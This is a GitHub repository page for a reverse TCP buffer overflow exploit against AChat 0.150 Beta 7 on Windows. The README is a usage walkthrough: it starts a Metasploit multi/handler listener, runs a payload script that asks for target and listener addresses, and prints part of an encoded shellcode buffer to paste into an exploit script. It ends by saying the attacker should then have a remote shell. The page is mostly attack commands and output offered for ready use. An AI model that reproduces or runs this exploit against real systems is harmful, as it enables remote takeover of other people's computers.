Skip to content

mpgn/AChat-Reverse-TCP-Exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 

Repository files navigation

AChat-Reverse-TCP-Exploit

Tested on AChat 0.150 Beta 7 Windows 7/8/10 x86/x64

Example: https://youtu.be/YgC_Rl6x3aM

You must use the MSF multi/handler to capture the shell

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.206:4443

root@omen:~#./AChat_Payload.sh

RHOST: $ENTER YOUR TARGET

LHOST: $ENTER YOUR LOCAL HOST

LPORT: $ENTER YOUR LISTENING PORT FOR MSFCONSOLE (DEFAULT IS 4444)

buf = "" buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"

YOU NEED TO COPY THE ABOVE OUTPUT INTO YOUR "AChat.Exploit.py" THIS IS THE PAYLOAD

root@omen:~#python AChat_Exploit.py

[+] BUFFER OVERFLOW PAYLOAD RELEASED -- CHECK YOUR HANDLER

If you check your handler. You should have a shell.

About

Tested on AChat 0.150 Beta 7 Windows 7/8/10 x86/x64

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published